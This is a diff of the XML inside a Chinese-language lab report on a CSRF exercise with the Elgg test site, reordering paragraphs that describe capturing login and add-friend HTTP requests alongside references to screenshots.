--- a/report4.docx
+++ b/report4.docx
@@ -41,117 +41,6 @@
             <wp:extent cx="5274310" cy="2463800"/>
             <wp:effectExtent l="0" t="0" r="2540" b="0"/>
             <wp:docPr id="1" name="图片 1"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId4"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5274310" cy="2463800"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>安装插件</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="018EA6E1" wp14:editId="58A4BC0F">
-            <wp:extent cx="3079908" cy="1670136"/>
-            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
-            <wp:docPr id="2" name="图片 2"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId5"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="3079908" cy="1670136"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>点击这里</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>，即可打开插件</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C0AEF0C" wp14:editId="0A81717C">
-            <wp:extent cx="1035103" cy="330217"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="4" name="图片 4"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -171,7 +60,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="1035103" cy="330217"/>
+                      <a:ext cx="5274310" cy="2463800"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -185,20 +74,23 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>安装插件</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CA78EE8" wp14:editId="39C17AEA">
-            <wp:extent cx="5274310" cy="1743075"/>
-            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
-            <wp:docPr id="5" name="图片 5"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="018EA6E1" wp14:editId="58A4BC0F">
+            <wp:extent cx="3079908" cy="1670136"/>
+            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
+            <wp:docPr id="2" name="图片 2"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -218,7 +110,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5274310" cy="1743075"/>
+                      <a:ext cx="3079908" cy="1670136"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -231,30 +123,18 @@
         </w:drawing>
       </w:r>
     </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve">登录 </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId8" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="a3"/>
-          </w:rPr>
-          <w:t>http://www.csrflabelgg.com/</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>，访问成功</w:t>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>点击这里</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>，即可打开插件</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -262,12 +142,53 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57FA356A" wp14:editId="673EC344">
-            <wp:extent cx="4117245" cy="2041769"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C0AEF0C" wp14:editId="0A81717C">
+            <wp:extent cx="1035103" cy="330217"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="3" name="图片 3"/>
+            <wp:docPr id="4" name="图片 4"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId8"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="1035103" cy="330217"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CA78EE8" wp14:editId="39C17AEA">
+            <wp:extent cx="5274310" cy="1743075"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
+            <wp:docPr id="5" name="图片 5"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -287,6 +208,75 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
+                      <a:ext cx="5274310" cy="1743075"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">登录 </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId10" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="a3"/>
+          </w:rPr>
+          <w:t>http://www.csrflabelgg.com/</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>，访问成功</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57FA356A" wp14:editId="673EC344">
+            <wp:extent cx="4117245" cy="2041769"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="3" name="图片 3"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId11"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
                       <a:ext cx="4122376" cy="2044313"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
@@ -302,11 +292,6 @@
     </w:p>
     <w:p/>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -695,11 +680,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
@@ -709,147 +689,6 @@
             <wp:extent cx="5274310" cy="1860550"/>
             <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
             <wp:docPr id="6" name="图片 6"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId10"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5274310" cy="1860550"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>首先是post方法请求域名下的login，3</w:t>
-      </w:r>
-      <w:r>
-        <w:t>02</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>响应，重定向到根目录之下。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>P</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>ost参数为</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51C2A3D9" wp14:editId="3314A69B">
-            <wp:extent cx="3441877" cy="1104957"/>
-            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
-            <wp:docPr id="7" name="图片 7"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId11"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="3441877" cy="1104957"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>而后get请求根目录，3</w:t>
-      </w:r>
-      <w:r>
-        <w:t>02</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>重定向到activity</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>，此次get请求无参数。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EEC9443" wp14:editId="2DFDC4C7">
-            <wp:extent cx="5274310" cy="1463675"/>
-            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
-            <wp:docPr id="8" name="图片 8"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -869,7 +708,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5274310" cy="1463675"/>
+                      <a:ext cx="5274310" cy="1860550"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -883,74 +722,31 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>之后的请求都是返回2</w:t>
-      </w:r>
-      <w:r>
-        <w:t>00</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>状态码，且均为get方式无参数请求。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="2"/>
-      </w:pPr>
-      <w:r>
-        <w:t>T</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>as</w:t>
-      </w:r>
-      <w:r>
-        <w:t>k2</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>首先以alice登录</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>搜索bob</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>y</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>首先是post方法请求域名下的login，3</w:t>
+      </w:r>
+      <w:r>
+        <w:t>02</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>响应，重定向到根目录之下。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>P</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>ost参数为</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -959,10 +755,10 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5497E27B" wp14:editId="65559E61">
-            <wp:extent cx="5274310" cy="1657350"/>
-            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
-            <wp:docPr id="9" name="图片 9"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51C2A3D9" wp14:editId="3314A69B">
+            <wp:extent cx="3441877" cy="1104957"/>
+            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
+            <wp:docPr id="7" name="图片 7"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -982,7 +778,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5274310" cy="1657350"/>
+                      <a:ext cx="3441877" cy="1104957"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -1000,32 +796,35 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>添加好友，查看请求。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>首先要清除一下缓存，</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
+        <w:t>而后get请求根目录，3</w:t>
+      </w:r>
+      <w:r>
+        <w:t>02</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>重定向到activity</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>，此次get请求无参数。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63F9ADD8" wp14:editId="37660D21">
-            <wp:extent cx="5274310" cy="342900"/>
-            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
-            <wp:docPr id="10" name="图片 10"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EEC9443" wp14:editId="2DFDC4C7">
+            <wp:extent cx="5274310" cy="1463675"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
+            <wp:docPr id="8" name="图片 8"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -1045,7 +844,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5274310" cy="342900"/>
+                      <a:ext cx="5274310" cy="1463675"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -1063,13 +862,55 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>然后点击add</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>friend</w:t>
+        <w:t>之后的请求都是返回2</w:t>
+      </w:r>
+      <w:r>
+        <w:t>00</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>状态码，且均为get方式无参数请求。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>T</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>as</w:t>
+      </w:r>
+      <w:r>
+        <w:t>k2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>首先以alice登录</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>搜索bob</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>y</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1078,10 +919,10 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66919A80" wp14:editId="7AE112B0">
-            <wp:extent cx="2292468" cy="2216264"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="11" name="图片 11"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5497E27B" wp14:editId="65559E61">
+            <wp:extent cx="5274310" cy="1657350"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:docPr id="9" name="图片 9"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -1101,7 +942,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="2292468" cy="2216264"/>
+                      <a:ext cx="5274310" cy="1657350"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -1119,13 +960,15 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>有如下请求</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>和响应</w:t>
+        <w:t>添加好友，查看请求。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>首先要清除一下缓存，</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1133,12 +976,11 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C223FBF" wp14:editId="6DA1E517">
-            <wp:extent cx="2608366" cy="2547606"/>
-            <wp:effectExtent l="0" t="0" r="1905" b="5715"/>
-            <wp:docPr id="13" name="图片 13"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63F9ADD8" wp14:editId="37660D21">
+            <wp:extent cx="5274310" cy="342900"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:docPr id="10" name="图片 10"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -1158,7 +1000,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="2613907" cy="2553018"/>
+                      <a:ext cx="5274310" cy="342900"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -1172,33 +1014,29 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>具体参数如下</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>然后点击add</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>friend</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F58D4EC" wp14:editId="6CB54347">
-            <wp:extent cx="5274310" cy="914400"/>
-            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
-            <wp:docPr id="12" name="图片 12"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66919A80" wp14:editId="7AE112B0">
+            <wp:extent cx="2292468" cy="2216264"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="11" name="图片 11"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -1218,6 +1056,113 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
+                      <a:ext cx="2292468" cy="2216264"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>有如下请求</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>和响应</w:t>
+      </w:r>
+    </w:p>
